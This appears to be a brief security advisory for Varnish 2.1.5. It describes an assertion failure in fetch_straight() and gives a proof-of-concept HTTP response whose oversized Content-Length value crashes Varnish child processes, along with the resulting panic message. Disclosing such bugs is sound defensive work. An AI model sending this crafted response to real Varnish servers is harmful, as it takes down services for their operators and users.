############################################### # fetch_straight() | ((uintmax_t)cl == cll) # ############################################### # # Authors: # # 22733db72ab3ed94b5f8a1ffcde850251fe6f466 # c8e74ebd8392fda4788179f9a02bb49337638e7b # AKAT-1 # ####################################### # Versions: 2.1.5 # Summary It is possible to crash (via assert) varnish child processes by sending invalid Content-Length reponse header. * Panic message: Assert error in fetch_straight(), cache_fetch.c line 65:#012 Condition((uintmax_t)cl == cll) not true. POC(response): -- cut -- HTTP/1.1 200 OK Content-Type: text/xml; charset=utf-8 Content-Length: 99999999999999999 -- cut -- EOF
